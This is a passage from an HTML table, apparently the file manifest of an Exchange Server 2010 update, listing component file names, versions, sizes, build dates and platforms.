applicable</td></tr><tr><td>Basiceditmeetingresponse.aspx</td><td>Not applicable</td><td>11,664</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basiceditmessage.aspx</td><td>Not applicable</td><td>8,801</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basiceditrecurrence.aspx</td><td>Not applicable</td><td>14,645</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basicfoldermanagement.aspx</td><td>Not applicable</td><td>3,630</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basicmeetingpage.aspx</td><td>Not applicable</td><td>12,659</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basicmessageview.aspx</td><td>Not applicable</td><td>4,084</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basicmessageviewwebpart.aspx</td><td>Not applicable</td><td>2,625</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basicmoveitem.aspx</td><td>Not applicable</td><td>4,112</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basicoptions.aspx</td><td>Not applicable</td><td>3,506</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basicreadaddistributionlist.aspx</td><td>Not applicable</td><td>4,364</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basicreadadorgperson.aspx</td><td>Not applicable</td><td>4,434</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basicreadcontact.aspx</td><td>Not applicable</td><td>4,406</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basicreaddistributionlist.aspx</td><td>Not applicable</td><td>4,864</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basicreadmessage.aspx</td><td>Not applicable</td><td>7,071</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Bpa.common.dll</td><td>14.3.470.0</td><td>233,160</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Bpa.configcollector.dll</td><td>14.3.470.0</td><td>126,664</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Bpa.networkcollector.dll</td><td>14.3.470.0</td><td>69,320</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Bpa.userinterface.dll</td><td>14.3.470.0</td><td>536,264</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Bpa.wizardengine.dll</td><td>14.3.470.0</td><td>134,856</td><td>03-Jan-2020</td><td>05:49</td><td>x86</td></tr><tr><td>Bsres.dll</td><td>14.3.470.0</td><td>92,592</td><td>03-Jan-2020</td><td>05:47</td><td>x64</td></tr><tr><td>C3197ef34a9e495cb17370b20389036a_premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>C4f748eeabe04db79b17bab56b1285a4_premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Calcalculation.ps1</td><td>Not applicable</td><td>29,804</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Captedt.js</td><td>Not applicable</td><td>11,208</td><td>03-Jan-2020</td><td>05:46</td><td>Not applicable</td></tr><tr><td>Casredirect.aspx</td><td>Not applicable</td><td>4,842</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Cb8b92743d7f42a7b8e53fe033206469_premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Checkdatabaseredundancy.ps1</td><td>Not applicable</td><td>80,171</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Checkinvalidrecipients.ps1</td><td>Not applicable</td><td>20,921</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Chksgfiles.dll</td><td>14.3.470.0</td><td>64,944</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Citsconstants.ps1</td><td>Not applicable</td><td>19,383</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Citslibrary.ps1</td><td>Not applicable</td><td>171,567</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Citstypes.ps1</td><td>Not applicable</td><td>16,664</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Clusmsg.dll</td><td>14.3.470.0</td><td>110,512</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Cmmap000.bin</td><td>Not applicable</td><td>381,737</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Cmn.js</td><td>Not applicable</td><td>7,356</td><td>03-Jan-2020</td><td>05:46</td><td>Not applicable</td></tr><tr><td>Cobrandingdiagnostics.aspx</td><td>Not applicable</td><td>1,649</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Collectovermetrics.ps1</td><td>Not applicable</td><td>77,533</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Collectreplicationmetrics.ps1</td><td>Not applicable</td><td>39,794</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Commonconnectfunctions.ps1</td><td>Not applicable</td><td>27,543</td><td>03-Jan-2020</td><td>05:45</td><td>Not applicable</td></tr><tr><td>Configureadam.ps1</td><td>Not applicable</td><td>21,183</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Configurenetworkprotocolparameters.ps1</td><td>Not applicable</td><td>16,878</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Configuresmbipsec.ps1</td><td>Not applicable</td><td>37,701</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Connectfunctions.ps1</td><td>Not applicable</td><td>32,908</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Connect_exchangeserver_help.xml</td><td>Not applicable</td><td>28,838</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Consoleinitialize.ps1</td><td>Not applicable</td><td>24,273</td><td>03-Jan-2020</td><td>05:45</td><td>Not applicable</td></tr><tr><td>Convertoabvdir.ps1</td><td>Not applicable</td><td>17,929</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Converttomessagelatency.ps1</td><td>Not applicable</td><td>12,408</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Cts.14.0.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>493</td><td>03-Jan-2020</td><td>05:48</td><td>Not applicable</td></tr><tr><td>Cts.14.1.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>493</td><td>03-Jan-2020</td><td>05:48</td><td>Not applicable</td></tr><tr><td>Cts.14.2.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>493</td><td>03-Jan-2020</td><td>05:48</td><td>Not applicable</td></tr><tr><td>Cts.14.3.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>493</td><td>03-Jan-2020</td><td>05:48</td><td>Not applicable</td></tr><tr><td>Cts.8.1.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>493</td><td>03-Jan-2020</td><td>05:48</td><td>Not applicable</td></tr><tr><td>Cts.8.2.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>493</td><td>03-Jan-2020</td><td>05:48</td><td>Not applicable</td></tr><tr><td>Cts.8.3.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>493</td><td>03-Jan-2020</td><td>05:48</td><td>Not applicable</td></tr><tr><td>Ctsvw.js</td><td>Not applicable</td><td>1,982</td><td>03-Jan-2020</td><td>05:46</td><td>Not applicable</td></tr><tr><td>Cts_exsmime.dll</td><td>14.3.470.0</td><td>319,920</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Cts_microsoft.exchange.data.common.dll</td><td>14.3.470.0</td><td>1,547,976</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Cts_microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>493</td><td>03-Jan-2020</td><td>05:48</td><td>Not applicable</td></tr><tr><td>Cts_policy.14.0.microsoft.exchange.data.common.dll</td><td>14.3.470.0</td><td>20,168</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Cts_policy.14.1.microsoft.exchange.data.common.dll</td><td>14.3.470.0</td><td>20,168</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Cts_policy.14.2.microsoft.exchange.data.common.dll</td><td>14.3.470.0</td><td>20,168</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Cts_policy.14.3.microsoft.exchange.data.common.dll</td><td>14.3.470.0</td><td>20,168</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Cts_policy.8.0.microsoft.exchange.data.common.dll</td><td>14.3.470.0</td><td>20,168</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Cts_policy.8.1.microsoft.exchange.data.common.dll</td><td>14.3.470.0</td><td>20,168</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Cts_policy.8.2.microsoft.exchange.data.common.dll</td><td>14.3.470.0</td><td>20,168</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Cts_policy.8.3.microsoft.exchange.data.common.dll</td><td>14.3.470.0</td><td>20,168</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Daddrbk.js</td><td>Not applicable</td><td>5,533</td><td>03-Jan-2020</td><td>05:46</td><td>Not applicable</td></tr><tr><td>Dagcommonlibrary.ps1</td><td>Not applicable</td><td>47,638</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Dattach.js</td><td>Not applicable</td><td>2,597</td><td>03-Jan-2020</td><td>05:46</td><td>Not applicable</td></tr><tr><td>Dess.dll</td><td>8.5.3.76</td><td>202,080</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Devect.dll</td><td>8.5.3.76</td><td>1,883,488</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Dewp.dll</td><td>8.5.3.76</td><td>294,240</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Df9d06af701642c98d336e7d2e95781c_premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Diagnosticcmdletcontroller.dll</td><td>14.3.470.0</td><td>47,560</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Diagnosticscriptcommonlibrary.ps1</td><td>Not applicable</td><td>14,864</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Disableinmemorytracing.ps1</td><td>Not applicable</td><td>11,238</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Disable_shouldmarkandskipoccupiedcatalog.reg</td><td>Not applicable</td><td>288</td><td>03-Jan-2020</td><td>05:48</td><td>Not applicable</td></tr><tr><td>Dsaccess.dll</td><td>14.3.470.0</td><td>842,160</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Dsaccessperf.dll</td><td>14.3.470.0</td><td>53,680</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Dscperf.dll</td><td>14.3.470.0</td><td>31,664</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Dup_cts_microsoft.exchange.data.common.dll</td><td>14.3.470.0</td><td>1,547,976</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Dup_ext_microsoft.exchange.data.transport.dll</td><td>14.3.470.0</td><td>335,704</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Ecpperfcounters.xml</td><td>Not applicable</td><td>29,280</td><td>03-Jan-2020</td><td>05:48</td><td>Not applicable</td></tr><tr><td>Edgeextensibility_microsoft.exchange.data.transport.versionpolicy.cfg</td><td>Not applicable</td><td>496</td><td>03-Jan-2020</td><td>05:48</td><td>Not applicable</td></tr><tr><td>Edgeextensibility_policy.8.0.microsoft.exchange.data.transport.dll</td><td>14.3.470.0</td><td>20,320</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Edgetransport.exe</td><td>14.3.470.0</td><td>35,976</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Editorstandalone.js</td><td>Not applicable</td><td>298,514</td><td>03-Jan-2020</td><td>05:46</td><td>Not applicable</td></tr><tr><td>Edittask.aspx</td><td>Not applicable</td><td>11,565</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Eext.14.0.microsoft.exchange.data.transport.versionpolicy.cfg</td><td>Not applicable</td><td>496</td><td>03-Jan-2020</td><td>05:48</td><td>Not applicable</td></tr><tr><td>Eext.14.1.microsoft.exchange.data.transport.versionpolicy.cfg</td><td>Not applicable</td><td>496</td><td>03-Jan-2020</td><td>05:48</td><td>Not applicable</td></tr><tr><td>Eext.14.2.microsoft.exchange.data.transport.versionpolicy.cfg</td><td>Not applicable</td><td>496</td><td>03-Jan-2020</td><td>05:48</td><td>Not applicable</td></tr><tr><td>Eext.14.3.microsoft.exchange.data.transport.versionpolicy.cfg</td><td>Not applicable</td><td>496</td><td>03-Jan-2020</td><td>05:48</td><td>Not applicable</td></tr><tr><td>Eext.8.1.microsoft.exchange.data.transport.versionpolicy.cfg</td><td>Not applicable</td><td>496</td><td>03-Jan-2020</td><td>05:48</td><td>Not applicable</td></tr><tr><td>Eext.8.2.microsoft.exchange.data.transport.versionpolicy.cfg</td><td>Not applicable</td><td>496</td><td>03-Jan-2020</td><td>05:48</td><td>Not applicable</td></tr><tr><td>Eext.8.3.microsoft.exchange.data.transport.versionpolicy.cfg</td><td>Not applicable</td><td>496</td><td>03-Jan-2020</td><td>05:48</td><td>Not applicable</td></tr><tr><td>Eext_policy.14.0.microsoft.exchange.data.transport.dll</td><td>14.3.470.0</td><td>20,336</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Eext_policy.14.1.microsoft.exchange.data.transport.dll</td><td>14.3.470.0</td><td>20,320</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Eext_policy.14.2.microsoft.exchange.data.transport.dll</td><td>14.3.470.0</td><td>20,312</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Eext_policy.14.3.microsoft.exchange.data.transport.dll</td><td>14.3.470.0</td><td>20,320</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Eext_policy.8.1.microsoft.exchange.data.transport.dll</td><td>14.3.470.0</td><td>20,312</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Eext_policy.8.2.microsoft.exchange.data.transport.dll</td><td>14.3.470.0</td><td>20,336</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Eext_policy.8.3.microsoft.exchange.data.transport.dll</td><td>14.3.470.0</td><td>20,336</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Ef306e728a08437e80fe5a896ded4b48_premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Enableinmemorytracing.ps1</td><td>Not applicable</td><td>11,240</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Enable_crossforestconnector.ps1</td><td>Not applicable</td><td>16,474</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Enable_outlookcertificateauthentication.ps1</td><td>Not applicable</td><td>26,785</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Enable_shouldmarkandskipoccupiedcatalog.reg</td><td>Not applicable</td><td>288</td><td>03-Jan-2020</td><td>05:48</td><td>Not applicable</td></tr><tr><td>Escprint.dll</td><td>14.3.470.0</td><td>28,104</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Ese.dll</td><td>14.3.470.0</td><td>3,226,056</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Eseback2.dll</td><td>14.3.470.0</td><td>170,928</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Esebcli2.dll</td><td>14.3.470.0</td><td>118,704</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Eseperf.dll</td><td>14.3.470.0</td><td>63,408</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Eseutil.exe</td><td>14.3.470.0</td><td>328,624</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Esevss.dll</td><td>14.3.470.0</td><td>56,752</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Exabp.dll</td><td>14.3.470.0</td><td>266,672</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Exbpa.config.xml</td><td>Not applicable</td><td>1,150,789</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Exbpa.e12.clientaccess.xml</td><td>Not applicable</td><td>18,445</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Exbpa.e12.global.xml</td><td>Not applicable</td><td>18,835</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Exbpa.e12.mailbox.xml</td><td>Not applicable</td><td>84,500</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Exbpa.e12.transport.xml</td><td>Not applicable</td><td>26,051</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Exbpa.e12.unifiedmessaging.xml</td><td>Not applicable</td><td>20,699</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Exbpa.e12.xml</td><td>Not applicable</td><td>20,774</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Exbpa.esecollector.dll</td><td>14.3.470.0</td><td>102,088</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Exbpa.exchangecollector.dll</td><td>14.3.470.0</td><td>29,384</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Exbpa.exe</td><td>14.3.470.0</td><td>77,512</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Exbpa.permissions.xml</td><td>Not applicable</td><td>95,797</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Exbpa.prereqs.xml</td><td>Not applicable</td><td>222,941</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Exbpa.rbac.xml</td><td>Not applicable</td><td>42,101</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Exbpa.readiness.xml</td><td>Not applicable</td><td>71,654</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Exbpa.shared.dll</td><td>14.3.470.0</td><td>130,760</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Exbpa.stayinginformed.config.xml</td><td>Not applicable</td><td>43,427</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Exbpa.transport.xml</td><td>Not applicable</td><td>37,643</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Exbpacmd.exe</td><td>14.3.470.0</td><td>28,872</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Exbpamdb.dll</td><td>14.3.470.0</td><td>25,000</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Exbpamon.dll</td><td>14.3.470.0</td><td>122,800</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Exchange.format.ps1xml</td><td>Not applicable</td><td>263,266</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Exchange.partial.types.ps1xml</td><td>Not applicable</td><td>19,223</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Exchange.ps1</td><td>Not applicable</td><td>19,316</td><td>03-Jan-2020</td><td>05:45</td><td>Not applicable</td></tr><tr><td>Exchange.support.format.ps1xml</td><td>Not applicable</td><td>23,089</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Exchange.types.ps1xml</td><td>Not applicable</td><td>361,212</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Exchangeblog.xml</td><td>Not applicable</td><td>119,220</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Exchmem.dll</td><td>14.3.470.0</td><td>71,600</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Exchsetupmsg.dll</td><td>14.3.470.0</td><td>19,880</td><td>03-Jan-2020</td><td>05:47</td><td>x64</td></tr><tr><td>Exchucutil.ps1</td><td>Not applicable</td><td>21,531</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Exdbfailureitemapi.dll</td><td>14.3.470.0</td><td>65,480</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Exdbmsg.dll</td><td>14.3.470.0</td><td>155,592</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Exfba.exe</td><td>14.3.470.0</td><td>111,024</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Exgdsf.dll</td><td>8.5.3.76</td><td>16,224</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Exhtml.dll</td><td>8.5.3.76</td><td>640,352</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Exmfa.config.xml</td><td>Not applicable</td><td>874,094</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Exmime.dll</td><td>14.3.470.0</td><td>339,888</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Expiredpassword.aspx</td><td>Not applicable</td><td>7,226</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Exportedgeconfig.ps1</td><td>Not applicable</td><td>25,266</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Export_outlookclassification.ps1</td><td>Not applicable</td><td>12,376</td><td>03-Jan-2020</td><td>05:46</td><td>Not applicable</td></tr><tr><td>Export_retentiontags.ps1</td><td>Not applicable</td><td>14,920</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Exppw.dll</td><td>14.3.470.0</td><td>73,648</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Exprfdll.dll</td><td>14.3.470.0</td><td>33,192</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Expta.config.xml</td><td>Not applicable</td><td>557,925</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Expta.e12.collection.xml</td><td>Not applicable</td><td>227,026</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Exrdrlbs.dll</td><td>14.3.470.0</td><td>31,152</td><td>03-Jan-2020</td><td>05:47</td><td>x64</td></tr><tr><td>Exrpc32.dll</td><td>14.3.470.0</td><td>1,665,968</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Exrw.dll</td><td>14.3.470.0</td><td>35,248</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Exsetdata.dll</td><td>14.3.470.0</td><td>1,811,888</td><td>03-Jan-2020</td><td>05:45</td><td>x64</td></tr><tr><td>Exsetup.exe</td><td>14.3.496.0</td><td>41,864</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Exsetupui.exe</td><td>14.3.470.0</td><td>261,760</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Extra.config.xml</td><td>Not applicable</td><td>35,001</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Extra.exe</td><td>14.3.470.0</td><td>130,760</td><td>03-Jan-2020</td><td>05:49</td><td>x86</td></tr><tr><td>Extrace.dll</td><td>14.3.470.0</td><td>170,416</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Extraceman.config.xml</td><td>Not applicable</td><td>87,680</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Extraceman.dll</td><td>14.3.470.0</td><td>69,320</td><td>03-Jan-2020</td><td>05:49</td><td>x86</td></tr><tr><td>Ext_microsoft.exchange.data.transport.dll</td><td>14.3.470.0</td><td>335,704</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Exwriter.dll</td><td>14.3.470.0</td><td>545,192</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Fadcnt.js</td><td>Not applicable</td><td>5,192</td><td>03-Jan-2020</td><td>05:46</td><td>Not applicable</td></tr><tr><td>Fedtcali.js</td><td>Not applicable</td><td>110,582</td><td>03-Jan-2020</td><td>05:46</td><td>Not applicable</td></tr><tr><td>Fedtrul.js</td><td>Not applicable</td><td>30,339</td><td>03-Jan-2020</td><td>05:46</td><td>Not applicable</td></tr><tr><td>Fixed.skin</td><td>Not applicable</td><td>12,879</td><td>03-Jan-2020</td><td>05:48</td><td>Not applicable</td></tr><tr><td>Flogon.js</td><td>Not applicable</td><td>4,296</td><td>03-Jan-2020</td><td>05:46</td><td>Not applicable</td></tr><tr><td>Freadmsg.js</td><td>Not applicable</td><td>13,127</td><td>03-Jan-2020</td><td>05:46</td><td>Not applicable</td></tr><tr><td>Galgrammargenerator.exe</td><td>14.3.470.0</td><td>27,784</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Getdatabaseforsearchindex.ps1</td><td>Not applicable</td><td>13,449</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Getsearchindexfordatabase.ps1</td><td>Not applicable</td><td>13,373</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Getucpool.ps1</td><td>Not applicable</td><td>17,620</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Get_antispamfilteringreport.ps1</td><td>Not applicable</td><td>13,717</td><td>03-Jan-2020</td><td>05:48</td><td>Not applicable</td></tr><tr><td>Get_antispamsclhistogram.ps1</td><td>Not applicable</td><td>12,567</td><td>03-Jan-2020</td><td>05:48</td><td>Not applicable</td></tr><tr><td>Get_antispamtopblockedsenderdomains.ps1</td><td>Not applicable</td><td>13,635</td><td>03-Jan-2020</td><td>05:48</td><td>Not applicable</td></tr><tr><td>Get_antispamtopblockedsenderips.ps1</td><td>Not applicable</td><td>12,683</td><td>03-Jan-2020</td><td>05:48</td><td>Not applicable</td></tr><tr><td>Get_antispamtopblockedsenders.ps1</td><td>Not applicable</td><td>13,406</td><td>03-Jan-2020</td><td>05:48</td><td>Not applicable</td></tr><tr><td>Get_antispamtoprblproviders.ps1</td><td>Not applicable</td><td>12,613</td><td>03-Jan-2020</td><td>05:48</td><td>Not applicable</td></tr><tr><td>Get_antispamtoprecipients.ps1</td><td>Not applicable</td><td>12,718</td><td>03-Jan-2020</td><td>05:48</td><td>Not applicable</td></tr><tr><td>Get_setuplog.ps1</td><td>Not applicable</td><td>15,222</td><td>03-Jan-2020</td><td>05:45</td><td>Not applicable</td></tr><tr><td>Get_setuplog_help.xml</td><td>Not applicable</td><td>22,267</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Google.protocolbuffers.dll</td><td>2.4.1.521</td><td>325,504</td><td>03-Jan-2020</td><td>05:49</td><td>x86</td></tr><tr><td>Gradienth.png</td><td>Not applicable</td><td>118</td><td>03-Jan-2020</td><td>05:46</td><td>Not applicable</td></tr><tr><td>Huffman_xpress.dll</td><td>14.3.470.0</td><td>40,368</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Ibfpx2.dll</td><td>8.5.3.76</td><td>145,760</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Ibgp42.dll</td><td>8.5.3.76</td><td>41,312</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Ibjpg2.dll</td><td>8.5.3.76</td><td>77,664</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Ibpcd2.dll</td><td>8.5.3.76</td><td>171,872</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Ibpsd2.dll</td><td>8.5.3.76</td><td>42,336</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Ibxbm2.dll</td><td>8.5.3.76</td><td>35,680</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Ibxpm2.dll</td><td>8.5.3.76</td><td>67,936</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Ibxwd2.dll</td><td>8.5.3.76</td><td>37,728</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><